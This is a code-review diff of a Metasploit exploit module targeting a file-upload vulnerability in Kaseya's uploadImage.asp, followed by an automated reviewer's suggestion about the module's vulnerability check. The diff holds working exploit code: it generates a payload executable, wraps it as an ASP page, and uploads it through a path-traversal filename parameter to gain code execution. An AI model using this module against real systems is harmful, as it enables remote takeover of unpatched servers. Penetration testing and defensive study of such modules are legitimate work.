Update based on jvazquez's suggestions.
parent
d1e4975f76
commit
21bb8fd25a
|
@ -26,7 +26,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']],
|
||||
'References' => [
|
||||
['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf'],
|
||||
['OSVDB', '99984'],
|
||||
['BID', '63782'],
|
||||
['EDB', '29675']
|
||||
],
|
||||
'Payload' => {},
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -47,15 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
|
||||
|
||||
if not res or res.code != 500
|
||||
return Exploit::Faliure::UnexpectedReply
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
@payload_name = "#{rand_text_alpha_lower(8)}.asp"
|
||||
exe = generate_payload_exe
|
||||
asp = Msf::Util::EXE.to_exe_asp(exe)
|
||||
|
@ -74,7 +77,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = send_request_cgi({
|
||||
"method" => "POST",
|
||||
"uri" => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
|
||||
"uri" => normalize_uri("SystemTab","uploadImage.asp"),
|
||||
"vars_get" => {
|
||||
"filename" => "..\\..\\..\\..\\#{@payload_name}"
|
||||
},
|
||||
"data" => data,
|
||||
"ctype" => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
"cookie" => cookie
|
||||
|
|
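Review bot: In the check hunk (`@ -47,15 +52,13`), a 404 now falls into the same `Exploit::CheckCode::Unknown` branch as a missing response, although the comment directly above says a 404 means uploadImage.asp was removed by the patch. Splitting the condition would let the check report a patched server as such: `return Exploit::CheckCode::Unknown unless res` followed by `return Exploit::CheckCode::Safe if res.code == 404`, keeping `Unknown` for any other non-500 status. Anyone triaging the results then gets a definite "not vulnerable" for patched hosts rather than an inconclusive answer. The check method begins above the hunk, so how `res` is requested is not visible here.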